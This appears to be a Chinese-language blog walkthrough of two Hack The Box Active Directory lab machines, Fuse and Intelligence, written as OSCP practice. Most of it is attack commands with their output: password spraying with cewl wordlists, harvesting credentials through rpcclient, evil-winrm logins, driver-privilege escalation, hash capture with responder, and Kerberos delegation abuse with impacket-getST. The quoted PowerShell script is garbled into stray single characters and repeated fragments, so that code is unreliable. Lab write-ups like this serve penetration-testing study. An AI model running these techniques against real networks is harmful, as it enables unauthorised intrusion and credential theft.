HTB-oscplike-Fuse+Intelligence
Fuse
除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了
htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了
medium难度的fuse 靶机IP 10.10.10.193
sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-20 07:35:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
smb进不去 hosts加好进去看80 发现了一些user
pmerton tlavel sthompson bhult administrator
但是没发现其他的东西了 估计就是要爆破了 这里直接瞎爆破是不行的
cewl --with-numbers -w pass -d 4 http://fuse.fabricorp.local/papercut/logs/html/index.htm
爬网站生成字典 然后再爆破 但是我这里不知道为什么没有响应 直接继续
最后爆破出来bhult和tlavel密码都是 Fabricorp01
但是发现是登不上去的 smbclient会显示
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
要改密码 smbpasswd -r 10.10.10.193 -U tlavel 随便改一个
但是不知道为啥还是不行 我感觉环境有问题
smb又没响应 改了密码又登不上 很恶心 直接继续得了
rpcclient登上去
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
且80端口可以看到是一个打印机
rpcclient $> enumprinters
flags:[0x800000]
name:[\10.10.10.193\HP-MFT01]
description:[\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
很明显 剩下能登陆的点多半就是winrm了
crackmapexec winrm 10.10.10.193 -u cc -p ‘$fab@s3Rv1ce$1’
其实前面的smb也可以用这个工具爆破 但是这个工具一方面会不准 一方面很慢
得到WINRM 10.10.10.193 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
evil-winrm登上去拿到flag af3a3e4e9f37c2611f761bacc4c8ca95
winpeas权限不够扫不动 systeminfo也不行 多半不是内核提权
进程和看了一些文件也没发现什么有意思的地方
那么多半就是在权限里了 whoami /all 看到有一个SeLoadDriverPrivilege
可以加载驱动程序就意味着可以加载恶意驱动程序了
google找到exploit 加载弹回shell即可
拿到flag 37d82b8145285f34eca0f55325b5997d
Intelligence
medium难度的intelligence 靶机IP 10.10.10.248
sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.10.248
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-20 18:01:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445进不去 80进去发现可以下载文件 同时格式是
http://10.10.10.248/documents/2020-01-01-upload.pdf
那就写个脚本把所有日期的爆破出来
这里很麻烦 因为所有日期的pdf里面都有内容 因此还需要再写脚本提取内容
提取完内容会在 2020-06-04-upload.pdf 发现一个密码
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
但是还他妈需要用户名 直接strings xxx.pdf可以发现creator是Jason.Patterson
但是以这个是不能登录的 所以我们要继续把所有的creator拿出来
cat *.pdf |strings| grep Creator |awk ‘{print $2}’| cut -b 2- |cut -d “)” -f 1
然后再去用这个密码爆破
最后得到Tiffany.Molina/NewIntelligenceCorpUser9876
smbmap看能进哪些目录 然后登上去嗯找
smbclient \\10.10.10.248\IT -U Tiffany.Molina%NewIntelligenceCorpUser9876
这个目录下找到一个ps1文件 另外一个user目录下就是flag
6f9e29e9f8adce3dccd8dc2a78daf4c6
然后看这个ps1
foreach($record in Get-ChildItem “AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb” | Where-Object Name -like “web*”) {
try {
r
e
q
u
e
s
t
=
I
n
v
o
k
e
−
W
e
b
R
e
q
u
e
s
t
−
U
r
i
"
h
t
t
p
:
/
/
request = Invoke-WebRequest -Uri "http://
request=Invoke−WebRequest−Uri"http://($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From ‘Ted Graves Ted.Graves@intelligence.htb’ -To ‘Ted Graves Ted.Graves@intelligence.htb’ -Subject “Host:
(
(
(record.Name) is down”
}
} catch {}
}
它会重复用凭据发请求 而当返回状态码不为200 他就会发邮件给TED说谁寄了
因为他用凭据 所以我们只要让他访问我们的机器然后捕获他的凭据就可以了
所以我们需要给它添加一个指向我们的dns 这个工具就自己去找吧
responder -I tun0嗅探到哈希 解出密码Ted.Graves/Mr.Teddy
接下来就可以进一步检索了 这里可以直接bloodhound了 看到
我们可以直接读取svc-int用户的密码 他这里给出的方案是一个exe
但是我们winrm之类的是上不去的 所以github上找脚本用
得到 svc_int$:::16cba97b4bc423795585b0b4bcee5047
而svc_int则对域控有约束委派的权限 bloodhound给的方案也是用不了的
但是这就不用找脚本了 直接impacket-getST拿银票就行了
impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :16cba97b4bc423795585b0b4bcee5047 -impersonate administrator -dc-ip 10.10.10.248
这里又有个小坑点 需要和目标机器时间相同
export KRB5CCNAME=administrator.ccache 票据设置好
然后随便你是secretsdump把hash爆出来登录还是smbclient直接登了
85981f8d7263a760821950b5e896b8a1
好勾八难 这要是oscp考试AD域的难度我真寄了
2721
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
